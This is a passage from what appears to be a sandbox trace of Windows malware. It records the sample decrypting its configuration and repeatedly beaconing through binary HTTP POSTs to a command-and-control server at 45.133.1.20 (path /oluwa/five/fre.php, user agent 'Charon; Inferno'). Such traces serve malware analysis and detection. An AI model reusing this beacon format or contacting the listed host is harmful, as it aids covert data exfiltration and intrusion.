(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0273.653] GetProcessHeap () returned 0x6a0000 [0273.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0273.653] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0273.653] GetProcessHeap () returned 0x6a0000 [0273.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0273.654] GetProcessHeap () returned 0x6a0000 [0273.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0273.654] GetProcessHeap () returned 0x6a0000 [0273.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0273.655] GetProcessHeap () returned 0x6a0000 [0273.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0273.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.657] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.667] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0273.676] GetProcessHeap () returned 0x6a0000 [0273.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0273.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.677] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0273.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.679] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.683] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.683] GetProcessHeap () returned 0x6a0000 [0273.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0273.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.695] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0273.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.697] CryptDestroyKey (hKey=0x6ad020) returned 1 [0273.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.698] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0273.698] GetProcessHeap () returned 0x6a0000 [0273.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0273.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.700] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0273.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.701] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0273.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.705] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0273.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.707] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0273.707] GetProcessHeap () returned 0x6a0000 [0273.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0273.707] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0273.707] GetProcessHeap () returned 0x6a0000 [0273.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0273.707] socket (af=2, type=1, protocol=6) returned 0x9bc [0273.707] connect (s=0x9bc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0273.742] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0273.742] GetProcessHeap () returned 0x6a0000 [0273.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0273.743] GetProcessHeap () returned 0x6a0000 [0273.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0273.757] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0273.761] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0273.761] GetProcessHeap () returned 0x6a0000 [0273.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba470 [0273.762] GetProcessHeap () returned 0x6a0000 [0273.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0273.764] GetProcessHeap () returned 0x6a0000 [0273.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0273.764] GetProcessHeap () returned 0x6a0000 [0273.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0273.783] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0273.787] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0273.787] GetProcessHeap () returned 0x6a0000 [0273.787] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0273.787] GetProcessHeap () returned 0x6a0000 [0273.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0273.789] send (s=0x9bc, buf=0x6bd460*, len=242, flags=0) returned 242 [0273.798] send (s=0x9bc, buf=0x6bb998*, len=159, flags=0) returned 159 [0273.798] GetProcessHeap () returned 0x6a0000 [0273.798] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0273.799] recv (in: s=0x9bc, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0273.855] GetProcessHeap () returned 0x6a0000 [0273.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0273.855] GetProcessHeap () returned 0x6a0000 [0273.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0273.856] GetProcessHeap () returned 0x6a0000 [0273.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba470 | out: hHeap=0x6a0000) returned 1 [0273.857] GetProcessHeap () returned 0x6a0000 [0273.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0273.858] closesocket (s=0x9bc) returned 0 [0273.858] GetProcessHeap () returned 0x6a0000 [0273.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0273.858] GetProcessHeap () returned 0x6a0000 [0273.858] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0273.859] GetProcessHeap () returned 0x6a0000 [0273.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0273.859] GetProcessHeap () returned 0x6a0000 [0273.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0273.860] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1750) returned 0x9bc [0273.861] Sleep (dwMilliseconds=0xea60) [0273.863] GetProcessHeap () returned 0x6a0000 [0273.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0273.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.864] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0273.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.869] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0273.877] GetProcessHeap () returned 0x6a0000 [0273.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0273.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.879] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0273.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.880] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0273.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.881] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0273.881] GetProcessHeap () returned 0x6a0000 [0273.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0273.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.934] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0273.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.936] CryptDestroyKey (hKey=0x6ad020) returned 1 [0273.976] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0273.977] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0273.977] GetProcessHeap () returned 0x6a0000 [0273.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0273.978] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.978] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0273.979] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.979] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0273.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.981] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0273.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0273.982] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0273.982] GetProcessHeap () returned 0x6a0000 [0273.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0273.982] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0273.982] GetProcessHeap () returned 0x6a0000 [0273.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0273.983] GetProcessHeap () returned 0x6a0000 [0273.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0273.984] GetProcessHeap () returned 0x6a0000 [0273.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0274.002] GetProcessHeap () returned 0x6a0000 [0274.002] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0274.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.004] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.013] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0274.031] GetProcessHeap () returned 0x6a0000 [0274.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0274.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.032] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0274.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.032] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.034] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.034] GetProcessHeap () returned 0x6a0000 [0274.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0274.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.036] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0274.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.038] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0274.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.039] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0274.039] GetProcessHeap () returned 0x6a0000 [0274.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0274.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.040] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0274.041] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.041] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0274.042] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.042] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0274.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.043] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0274.043] GetProcessHeap () returned 0x6a0000 [0274.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0274.045] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0274.045] GetProcessHeap () returned 0x6a0000 [0274.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0274.045] socket (af=2, type=1, protocol=6) returned 0x9c0 [0274.046] connect (s=0x9c0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0274.072] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0274.072] GetProcessHeap () returned 0x6a0000 [0274.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0274.072] GetProcessHeap () returned 0x6a0000 [0274.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0274.073] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0274.074] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0274.074] GetProcessHeap () returned 0x6a0000 [0274.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba0b0 [0274.074] GetProcessHeap () returned 0x6a0000 [0274.074] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0274.074] GetProcessHeap () returned 0x6a0000 [0274.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0274.075] GetProcessHeap () returned 0x6a0000 [0274.075] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0274.075] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0274.076] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0274.076] GetProcessHeap () returned 0x6a0000 [0274.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0274.076] GetProcessHeap () returned 0x6a0000 [0274.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0274.077] send (s=0x9c0, buf=0x6bd460*, len=242, flags=0) returned 242 [0274.078] send (s=0x9c0, buf=0x6bb998*, len=159, flags=0) returned 159 [0274.078] GetProcessHeap () returned 0x6a0000 [0274.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0274.078] recv (in: s=0x9c0, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0274.183] GetProcessHeap () returned 0x6a0000 [0274.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0274.184] GetProcessHeap () returned 0x6a0000 [0274.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0274.184] GetProcessHeap () returned 0x6a0000 [0274.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba0b0 | out: hHeap=0x6a0000) returned 1 [0274.184] GetProcessHeap () returned 0x6a0000 [0274.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0274.185] closesocket (s=0x9c0) returned 0 [0274.186] GetProcessHeap () returned 0x6a0000 [0274.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0274.186] GetProcessHeap () returned 0x6a0000 [0274.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0274.186] GetProcessHeap () returned 0x6a0000 [0274.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0274.187] GetProcessHeap () returned 0x6a0000 [0274.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0274.188] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1754) returned 0x9c0 [0274.190] Sleep (dwMilliseconds=0xea60) [0274.191] GetProcessHeap () returned 0x6a0000 [0274.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0274.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.192] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0274.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0274.213] GetProcessHeap () returned 0x6a0000 [0274.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0274.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.216] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0274.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.222] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0274.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.223] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0274.223] GetProcessHeap () returned 0x6a0000 [0274.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0274.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.225] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0274.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.227] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0274.227] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0274.228] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0274.228] GetProcessHeap () returned 0x6a0000 [0274.228] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0274.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.229] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0274.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.230] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0274.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.232] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0274.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0274.233] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0274.233] GetProcessHeap () returned 0x6a0000 [0274.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0274.233] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0274.234] GetProcessHeap () returned 0x6a0000 [0274.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 